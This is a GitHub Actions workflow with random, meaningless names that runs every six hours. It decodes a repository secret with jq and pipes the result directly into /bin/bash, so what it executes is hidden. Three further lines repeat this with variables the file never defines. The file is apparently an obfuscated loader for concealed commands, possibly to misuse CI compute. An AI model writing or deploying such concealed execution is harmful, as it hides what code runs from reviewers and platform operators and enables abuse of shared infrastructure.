name: fujiancheng7654

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fujiancheng7654
        env:
          ndc409: ${{ secrets.ndc409 }}
        run: |
          echo $ndc409 | jq -r .bdp02 | /bin/bash
          echo $z9740 | jq -r .tipn13 | /bin/bash
          echo $qk732 | jq -r .gdwry5136 | /bin/bash
          echo $ozu9 | jq -r .f8655 | /bin/bash

